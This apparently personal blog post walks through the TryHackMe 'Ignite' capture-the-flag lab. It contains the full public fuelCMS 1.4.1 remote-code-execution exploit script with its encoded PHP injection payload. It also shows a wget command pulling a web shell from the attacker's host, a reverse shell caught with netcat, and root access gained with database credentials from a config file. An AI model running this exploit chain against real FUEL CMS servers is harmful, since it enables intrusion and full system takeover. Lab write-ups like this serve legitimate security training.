zacheller@home:~/blog$

TryHackMe - Ignite


Enumeration

nmap

root@kali:~/Security/TryHackMe/ignite# portscan 10.10.164.23
Open ports: 80
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 16:05 EDT
Nmap scan report for 10.10.164.23
Host is up (0.15s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/fuel/
|_http-title: Welcome to FUEL CMS

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.52 seconds

HTTP

Navigating to http://http://10.10.164.23/, we get a Getting Started page for Fuel CMS with some useful information in how the database is set up. However /fuel/application/config/database.php is forbidden with our permissions. robots.txt already told us about /fuel/ but, the home page explicitly tells us:

To access the FUEL admin, go to:
http://10.10.164.23/fuel
User name: admin
Password: admin (you can and should change this password and admin user information after logging in)

At http://http://10.10.164.23/fuel, we have a login form which opens with the provided admin:admin credentials. Based on the site_docs, we have a couple places to try setting up a reverse shell: Pages, Layouts, and Assets.

Before we go too far, let’s search for a exploit for fuelCMS v1.4:

root@kali:~/Security/TryHackMe/ignite# searchsploit fuelCMS
------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                           |  Path
                                                                         | (/usr/share/exploitdb/)
------------------------------------------------------------------------- ----------------------------------------
fuelCMS 1.4.1 - Remote Code Execution                                    | exploits/linux/webapps/47138.py
------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

After copying the exploit to our working directory, we need to change the url variable and comment out the provided proxy since we aren’t using Burp Suite.

# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763


import requests
import urllib

# url = "http://127.0.0.1:8881"
url = "http://10.10.164.23"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
	xxxx = raw_input('cmd:')
	burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
	# proxy = {"http":"http://127.0.0.1:8080"}
	# r = requests.get(burp0_url, proxies=proxy)
	r = requests.get(burp0_url)

	html = "<!DOCTYPE html>"
	htmlcharset = r.text.find(html)

	begin = r.text[0:20]
	dup = find_nth_overlapping(r.text,begin,2)

	print r.text[0:dup]

Gaining RCE Access

The script works, but prints out unnecessary HTML. It’s a bit clunky, but we can confirm we are www-data and grab the usr flag from /home/www-data/flag.txt. Since this is a bit clunky and the connection keeps dropping, we should use phpbash.php.

Getting a Shell

# Attacker
root@kali:~/scripts/phpbash# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.164.23 - - [31/Aug/2020 14:01:59] "GET /phpbash.php HTTP/1.1" 200 -

# Victim 
cmd:"wget http://10.2.37.2:8000/phpbash.php"

Navigate to http://10.10.164.23/phpbash.php:

www-data@ubuntu:/var/www/html# cat /home/www-data/flag.txt
{censored}

Escalating Privileges

We were told that the database config file can be found in fuel/application/config/database.php, so let’s see if we can grab some credentials.

www-data@ubuntu:/var/www/html# cat /fuel/application/config/database.php
...
$db['default'] = array(
'dsn' => '',
'hostname' => 'localhost',
'username' => 'root',
'password' => 'mememe',
'database' => 'fuel_schema',
'dbdriver' => 'mysqli',
...
www-data@ubuntu:/var/www/html# su root
su: must be run from a terminal

We may have root credentials, but we cannot check since we need to spawn a TTY shell to run su. Seems phpbash.php was fun but is pretty unstable, so let’s wget a standard reverse shell.

root@kali:~/scripts# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.164.23 - - [31/Aug/2020 15:10:02] "GET /php-reverse-shell.php HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
root@kali:~/scripts# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.2.37.2] from (UNKNOWN) [10.10.164.23] 47428
Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 12:14:27 up  1:23,  0 users,  load average: 1.02, 0.98, 0.91
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@ubuntu:/$ su root
su root
Password: mememe

root@ubuntu:/# cat /root/root.txt
cat /root/root.txt
{censored}

I hope you enjoyed the walkthrough.